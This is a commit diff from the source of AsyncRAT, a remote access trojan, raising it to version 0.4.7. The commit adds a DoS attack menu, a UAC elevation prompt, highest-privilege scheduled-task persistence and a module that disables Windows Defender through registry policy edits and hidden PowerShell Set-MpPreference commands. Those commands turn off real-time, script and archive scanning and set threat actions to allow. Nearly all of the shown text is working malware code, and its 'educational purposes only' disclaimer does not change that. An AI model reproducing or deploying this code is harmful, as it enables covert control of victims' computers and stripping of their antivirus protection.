Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update

Browse Source 
Added dos attack
Added disable windows defender
Added ask for uac prompt
Fix install privileges
This commit is contained in:
NYAN CAT 2019-05-09 06:27:20 -07:00
parent 8663f03b6f
commit 73acd52efe
17 changed files with 387 additions and 42 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj
View File

@ -219,6 +219,8 @@
</ItemGroup>
<ItemGroup>
<Content Include="async_icon.ico" />
<None Include="Resources\uac.png" />
<None Include="Resources\disabled.png" />
<None Include="Resources\AsyncRAT-Sharp.exe.config" />
<None Include="Resources\ddos.png" />
<None Include="Resources\settings.png" />

62
AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs generated
View File

@ -38,6 +38,7 @@
this.lv_os = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_version = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_prefor = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_admin = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.contextMenuStrip1 = new System.Windows.Forms.ContextMenuStrip(this.components);
this.cLIENTOPTIONSToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.cLOSEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
@ -51,15 +52,18 @@
this.sENDFILETOMEMORYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.rEMOTEDESKTOPToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.kEYLOGGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.fILEMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.pROCESSMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.dISABLESToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.wINDOWDSDEFENDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.bOTKILLERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.uSBSPREADToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator2 = new System.Windows.Forms.ToolStripSeparator();
this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator3 = new System.Windows.Forms.ToolStripSeparator();
this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.statusStrip1 = new System.Windows.Forms.StatusStrip();
this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
this.ping = new System.Windows.Forms.Timer(this.components);
@ -103,7 +107,8 @@
this.lv_user,
this.lv_os,
this.lv_version,
this.lv_prefor});
this.lv_prefor,
this.lv_admin});
this.listView1.ContextMenuStrip = this.contextMenuStrip1;
this.listView1.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView1.FullRowSelect = true;
@ -154,6 +159,11 @@
this.lv_prefor.Text = "PERFORMANCE";
this.lv_prefor.Width = 170;
//
// lv_admin
//
this.lv_admin.Text = "PRIVILEGES";
this.lv_admin.Width = 138;
//
// contextMenuStrip1
//
this.contextMenuStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
@ -169,14 +179,16 @@
this.toolStripMenuItem1,
this.fILEMANAGERToolStripMenuItem,
this.pROCESSMANAGERToolStripMenuItem,
this.dISABLESToolStripMenuItem,
this.bOTKILLERToolStripMenuItem,
this.uSBSPREADToolStripMenuItem,
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem,
this.toolStripSeparator2,
this.bUILDERToolStripMenuItem,
this.toolStripSeparator3,
this.aBOUTToolStripMenuItem});
this.contextMenuStrip1.Name = "contextMenuStrip1";
this.contextMenuStrip1.Size = new System.Drawing.Size(283, 442);
this.contextMenuStrip1.Size = new System.Drawing.Size(283, 502);
//
// cLIENTOPTIONSToolStripMenuItem
//
@ -271,6 +283,14 @@
this.kEYLOGGERToolStripMenuItem.Text = "KEYLOGGER";
this.kEYLOGGERToolStripMenuItem.Click += new System.EventHandler(this.KEYLOGGERToolStripMenuItem_Click);
//
// toolStripMenuItem1
//
this.toolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos;
this.toolStripMenuItem1.Name = "toolStripMenuItem1";
this.toolStripMenuItem1.Size = new System.Drawing.Size(282, 30);
this.toolStripMenuItem1.Text = "DOS ATTACK";
this.toolStripMenuItem1.Click += new System.EventHandler(this.ToolStripMenuItem1_Click);
//
// fILEMANAGERToolStripMenuItem
//
this.fILEMANAGERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.filemanager;
@ -287,6 +307,22 @@
this.pROCESSMANAGERToolStripMenuItem.Text = "PROCESS MANAGER";
this.pROCESSMANAGERToolStripMenuItem.Click += new System.EventHandler(this.pROCESSMANAGERToolStripMenuItem_Click);
//
// dISABLESToolStripMenuItem
//
this.dISABLESToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.wINDOWDSDEFENDERToolStripMenuItem});
this.dISABLESToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.disabled;
this.dISABLESToolStripMenuItem.Name = "dISABLESToolStripMenuItem";
this.dISABLESToolStripMenuItem.Size = new System.Drawing.Size(282, 30);
this.dISABLESToolStripMenuItem.Text = "DISABLES";
//
// wINDOWDSDEFENDERToolStripMenuItem
//
this.wINDOWDSDEFENDERToolStripMenuItem.Name = "wINDOWDSDEFENDERToolStripMenuItem";
this.wINDOWDSDEFENDERToolStripMenuItem.Size = new System.Drawing.Size(289, 30);
this.wINDOWDSDEFENDERToolStripMenuItem.Text = "WINDOWDS DEFENDER";
this.wINDOWDSDEFENDERToolStripMenuItem.Click += new System.EventHandler(this.WINDOWDSDEFENDERToolStripMenuItem_Click);
//
// bOTKILLERToolStripMenuItem
//
this.bOTKILLERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.botkiller;
@ -303,6 +339,14 @@
this.uSBSPREADToolStripMenuItem.Text = "USB SPREAD";
this.uSBSPREADToolStripMenuItem.Click += new System.EventHandler(this.USBSPREADToolStripMenuItem_Click);
//
// gETADMINISTRATORPRIVILEGESToolStripMenuItem
//
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.uac;
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Name = "gETADMINISTRATORPRIVILEGESToolStripMenuItem";
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Size = new System.Drawing.Size(282, 30);
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Text = "GET ADMIN PRIVILEGES";
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Click += new System.EventHandler(this.GETADMINISTRATORPRIVILEGESToolStripMenuItem_Click);
//
// toolStripSeparator2
//
this.toolStripSeparator2.Name = "toolStripSeparator2";
@ -329,14 +373,6 @@
this.aBOUTToolStripMenuItem.Text = "ABOUT";
this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click);
//
// toolStripMenuItem1
//
this.toolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos;
this.toolStripMenuItem1.Name = "toolStripMenuItem1";
this.toolStripMenuItem1.Size = new System.Drawing.Size(282, 30);
this.toolStripMenuItem1.Text = "DOS ATTACK";
this.toolStripMenuItem1.Click += new System.EventHandler(this.ToolStripMenuItem1_Click);
//
// statusStrip1
//
this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
@ -598,6 +634,10 @@
private System.Windows.Forms.ContextMenuStrip contextMenuStrip3;
private System.Windows.Forms.ToolStripMenuItem notificationOFFToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem toolStripMenuItem1;
private System.Windows.Forms.ToolStripMenuItem dISABLESToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem wINDOWDSDEFENDERToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem gETADMINISTRATORPRIVILEGESToolStripMenuItem;
private System.Windows.Forms.ColumnHeader lv_admin;
}
}

88
AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
View File

@ -42,7 +42,7 @@ namespace AsyncRAT_Sharp
{
if (!File.Exists(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config")))
{
// File.WriteAllText(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"), Properties.Resources.AsyncRAT_Sharp_exe);
// File.WriteAllText(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"), Properties.Resources.AsyncRAT_Sharp_exe);
Process.Start(Application.ExecutablePath);
Environment.Exit(0);
}
@ -224,20 +224,24 @@ namespace AsyncRAT_Sharp
{
if (listView1.SelectedItems.Count > 0)
{
try
DialogResult dialogResult = MessageBox.Show(this, "Are you sure you want to unistall", "AsyncRAT | Unistall", MessageBoxButtons.YesNo, MessageBoxIcon.Information);
if (dialogResult == DialogResult.Yes)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "uninstall";
foreach (ListViewItem itm in listView1.SelectedItems)
try
{
Clients client = (Clients)itm.Tag;
ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes());
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "uninstall";
foreach (ListViewItem itm in listView1.SelectedItems)
{
Clients client = (Clients)itm.Tag;
ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes());
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
return;
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
return;
}
}
}
@ -644,10 +648,68 @@ namespace AsyncRAT_Sharp
Properties.Settings.Default.Save();
}
private readonly FormDOS formDOS = new FormDOS();
private readonly FormDOS formDOS = new FormDOS();
private void ToolStripMenuItem1_Click(object sender, EventArgs e)
{
formDOS.Show();
}
private void WINDOWDSDEFENDERToolStripMenuItem_Click(object sender, EventArgs e)
{
if (listView1.SelectedItems.Count > 0)
{
DialogResult dialogResult = MessageBox.Show(this, "Administrator privileges are required!", "AsyncRAT | Disbale Defender", MessageBoxButtons.YesNo, MessageBoxIcon.Information);
if (dialogResult == DialogResult.Yes)
{
try
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "defender";
foreach (ListViewItem itm in listView1.SelectedItems)
{
if (itm.SubItems[lv_admin.Index].Text == "Administrator")
{
Clients client = (Clients)itm.Tag;
ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes());
}
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
return;
}
}
}
}
private void GETADMINISTRATORPRIVILEGESToolStripMenuItem_Click(object sender, EventArgs e)
{
if (listView1.SelectedItems.Count > 0)
{
DialogResult dialogResult = MessageBox.Show(this, "Popup UAC prompt? ", "AsyncRAT | Disbale Defender", MessageBoxButtons.YesNo, MessageBoxIcon.Information);
if (dialogResult == DialogResult.Yes)
{
try
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "uac";
foreach (ListViewItem itm in listView1.SelectedItems)
{
if (itm.SubItems[lv_admin.Index].Text != "Administrator")
{
Clients client = (Clients)itm.Tag;
ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes());
}
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
return;
}
}
}
}
}
}

1
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs
View File

@ -31,6 +31,7 @@ namespace AsyncRAT_Sharp.Handle_Packet
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Version").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Admin").AsString);
client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString;
client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
Program.form1.listView1.Items.Add(client.LV);

20
AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs generated
View File

@ -144,6 +144,16 @@ namespace AsyncRAT_Sharp.Properties {
}
}
/// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary>
internal static System.Drawing.Bitmap disabled {
get {
object obj = ResourceManager.GetObject("disabled", resourceCulture);
return ((System.Drawing.Bitmap)(obj));
}
}
/// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary>
@ -264,6 +274,16 @@ namespace AsyncRAT_Sharp.Properties {
}
}
/// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary>
internal static System.Drawing.Bitmap uac {
get {
object obj = ResourceManager.GetObject("uac", resourceCulture);
return ((System.Drawing.Bitmap)(obj));
}
}
/// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary>

16
AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx
View File

@ -130,9 +130,18 @@
<data name="arrow_up" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\arrow_up.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="ddos" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="play-button" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\play-button.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="disabled" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\disabled.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="AsyncRAT_Sharp_exe" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\AsyncRAT-Sharp.exe.config;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252</value>
</data>
<data name="botkiller" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\botkiller.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
@ -178,10 +187,7 @@
<data name="visit" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\visit.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="ddos" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="AsyncRAT_Sharp_exe" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\AsyncRAT-Sharp.exe.config;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252</value>
<data name="uac" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
</root>

BIN
AsyncRAT-C#/AsyncRAT-Sharp/Resources/disabled.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 815 B

BIN
AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.8 KiB

2
AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
View File

@ -14,6 +14,6 @@ namespace AsyncRAT_Sharp
public static string Password { get; set; }
public static Aes256 AES{ get; set; }
public static readonly string Version = "AsyncRAT 0.4.6";
public static readonly string Version = "AsyncRAT 0.4.7";
}
}

2
AsyncRAT-C#/Client/Client.csproj
View File

@ -80,7 +80,9 @@
<Compile Include="Handle Packet\HandleDos.cs" />
<Compile Include="Handle Packet\HandleFileManager.cs" />
<Compile Include="Handle Packet\HandleGetScreenShot.cs" />
<Compile Include="Handle Packet\HandleUAC.cs" />
<Compile Include="Handle Packet\HandleUninstall.cs" />
<Compile Include="Handle Packet\HandleWindowsDefender.cs" />
<Compile Include="Handle Packet\Packet.cs" />
<Compile Include="Handle Packet\HandleLimeLogger.cs" />
<Compile Include="Handle Packet\HandleProcessManager.cs" />

36
AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs Normal file
View File

@ -0,0 +1,36 @@
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Security.Principal;
using System.Text;
namespace Client.Handle_Packet
{
public class HandleUAC
{
public HandleUAC()
{
if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return;
try
{
Process proc = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = Process.GetCurrentProcess().MainModule.FileName,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
Verb = "runas"
}
};
proc.Start();
Environment.Exit(0);
}
catch { }
}
}
}

18
AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs
View File

@ -5,6 +5,7 @@ using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Security.Principal;
using System.Text;
namespace Client.Handle_Packet
@ -17,9 +18,22 @@ namespace Client.Handle_Packet
{
try
{
Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").DeleteValue(Path.GetFileName(Settings.ClientFullPath));
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").DeleteValue(Path.GetFileName(Settings.ClientFullPath));
else
{
Process.Start(new ProcessStartInfo()
{
FileName = "schtasks",
Arguments = $"/delete /tn {Path.GetFileName(Settings.ClientFullPath)} /f",
CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = true,
WindowStyle = ProcessWindowStyle.Hidden
});
}
catch { }
}
catch { }
}
ProcessStartInfo Del = null;
try

129
AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs Normal file
View File

@ -0,0 +1,129 @@
using System;
using Microsoft.Win32;
using System.Diagnostics;
using System.Security.Principal;
// │ Author : NYAN CAT
// │ Name : Disable Windows Defender v1.0
// │ Contact : https://github.com/NYAN-x-CAT
// This program is distributed for educational purposes only.
namespace Client.Handle_Packet
{
public class HandleWindowsDefender
{
public HandleWindowsDefender()
{
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return;
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1");
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1");
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1");
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1");
RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"); //Windows 10 1903 Redstone 6
CheckDefender();
}
private static void RegistryEdit(string regPath, string name, string value)
{
try
{
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree))
{
if (key == null)
{
Registry.LocalMachine.CreateSubKey(regPath).SetValue(name, value, RegistryValueKind.DWord);
return;
}
if (key.GetValue(name) != (object)value)
key.SetValue(name, value, RegistryValueKind.DWord);
}
}
catch { }
}
private static void CheckDefender()
{
Process proc = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = "powershell",
Arguments = "Get-MpPreference -verbose",
UseShellExecute = false,
RedirectStandardOutput = true,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true
}
};
proc.Start();
while (!proc.StandardOutput.EndOfStream)
{
string line = proc.StandardOutput.ReadLine();
if (line.Contains(@"DisableRealtimeMonitoring") && line.Contains("False"))
RunPS("Set-MpPreference -DisableRealtimeMonitoring $true"); //real-time protection
else if (line.Contains(@"DisableBehaviorMonitoring") && line.Contains("False"))
RunPS("Set-MpPreference -DisableBehaviorMonitoring $true"); //behavior monitoring
else if (line.Contains(@"DisableBlockAtFirstSeen") && line.Contains("False"))
RunPS("Set-MpPreference -DisableBlockAtFirstSeen $true");
else if (line.Contains(@"DisableIOAVProtection") && line.Contains("False"))
RunPS("Set-MpPreference -DisableIOAVProtection $true"); //scans all downloaded files and attachments
else if (line.Contains(@"DisablePrivacyMode") && line.Contains("False"))
RunPS("Set-MpPreference -DisablePrivacyMode $true"); //displaying threat history
else if (line.Contains(@"SignatureDisableUpdateOnStartupWithoutEngine") && line.Contains("False"))
RunPS("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"); //definition updates on startup
else if (line.Contains(@"DisableArchiveScanning") && line.Contains("False"))
RunPS("Set-MpPreference -DisableArchiveScanning $true"); //scan archive files, such as .zip and .cab files
else if (line.Contains(@"DisableIntrusionPreventionSystem") && line.Contains("False"))
RunPS("Set-MpPreference -DisableIntrusionPreventionSystem $true"); // network protection
else if (line.Contains(@"DisableScriptScanning") && line.Contains("False"))
RunPS("Set-MpPreference -DisableScriptScanning $true"); //scanning of scripts during scans
else if (line.Contains(@"SubmitSamplesConsent") && !line.Contains("2"))
RunPS("Set-MpPreference -SubmitSamplesConsent 2"); //MAPSReporting
else if (line.Contains(@"MAPSReporting") && !line.Contains("0"))
RunPS("Set-MpPreference -MAPSReporting 0"); //MAPSReporting
else if (line.Contains(@"HighThreatDefaultAction") && !line.Contains("6"))
RunPS("Set-MpPreference -HighThreatDefaultAction 6 -Force"); // high level threat // Allow
else if (line.Contains(@"ModerateThreatDefaultAction") && !line.Contains("6"))
RunPS("Set-MpPreference -ModerateThreatDefaultAction 6"); // moderate level threat
else if (line.Contains(@"LowThreatDefaultAction") && !line.Contains("6"))
RunPS("Set-MpPreference -LowThreatDefaultAction 6"); // low level threat
else if (line.Contains(@"SevereThreatDefaultAction") && !line.Contains("6"))
RunPS("Set-MpPreference -SevereThreatDefaultAction 6"); // severe level threat
}
}
private static void RunPS(string args)
{
Process proc = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = "powershell",
Arguments = args,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true
}
};
proc.Start();
}
}
}

28
AsyncRAT-C#/Client/Handle Packet/Packet.cs
View File

@ -25,35 +25,47 @@ namespace Client.Handle_Packet
case "sendMessage":
{
MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
break;
}
break;
case "Ping":
{
Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString);
break;
}
break;
case "thumbnails":
{
new HandleGetScreenShot();
break;
}
break;
case "sendFile":
{
Received();
new HandleSendTo().SendToDisk(unpack_msgpack);
break;
}
break;
case "sendMemory":
{
Received();
new HandleSendTo().SendToMemory(unpack_msgpack);
break;
}
case "defender":
{
new HandleWindowsDefender();
break;
}
case "uac":
{
new HandleUAC();
break;
}
break;
case "close":
{
@ -64,8 +76,8 @@ namespace Client.Handle_Packet
}
catch { }
Environment.Exit(0);
break;
}
break;
case "restart":
{
@ -77,14 +89,14 @@ namespace Client.Handle_Packet
catch { }
Process.Start(Application.ExecutablePath);
Environment.Exit(0);
break;
}
break;
case "uninstall":
{
new HandleUninstall();
break;
}
break;
case "usbSpread":
{

21
AsyncRAT-C#/Client/Install/NormalStartup.cs
View File

@ -3,6 +3,8 @@ using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
using System.Threading;
namespace Client.Install
{
@ -29,14 +31,31 @@ namespace Client.Install
FileStream fs;
if (File.Exists(Settings.ClientFullPath))
{
File.Delete(Settings.ClientFullPath);
Thread.Sleep(1000);
fs = new FileStream(Settings.ClientFullPath, FileMode.Create);
}
else
fs = new FileStream(Settings.ClientFullPath, FileMode.CreateNew);
byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
fs.Write(clientExe, 0, clientExe.Length);
fs.Dispose();
Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath);
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath);
else
{
Process.Start(new ProcessStartInfo()
{
FileName = "schtasks",
Arguments = $"/create /sc onlogon /rl highest /tn {Path.GetFileName(Settings.ClientFullPath)} /tr " + "\"" + Settings.ClientFullPath + "\"",
CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = true,
WindowStyle = ProcessWindowStyle.Hidden
});
}
Methods.CloseMutex();
Process.Start(Settings.ClientFullPath);
Environment.Exit(0);

2
AsyncRAT-C#/Client/Settings.cs
View File

@ -9,7 +9,7 @@ namespace Client
{
public static string Ports = "6606";
public static string Host = "127.0.0.1";
public static string Version = "AsyncRAT 0.4.6";
public static string Version = "AsyncRAT 0.4.7";
public static string Install = "false";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Password = "NYAN CAT";

2
AsyncRAT-C#/Client/Sockets/ClientSocket.cs
View File

@ -8,6 +8,7 @@ using System.IO;
using System.Net.Sockets;
using System.Threading;
using System.Text;
using System.Security.Principal;
// │ Author : NYAN CAT
// │ Name : Nyan Socket v0.1
@ -80,6 +81,7 @@ namespace Client.Sockets
Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName;
msgpack.ForcePathObject("Version").AsString = Settings.Version;
msgpack.ForcePathObject("Admin").AsString = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator).ToString().ToLower().Replace("true", "Administrator").Replace("false","User");
TheCPUCounter.NextValue();
msgpack.ForcePathObject("Performance").AsString = $"CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%";
return msgpack.Encode2Bytes();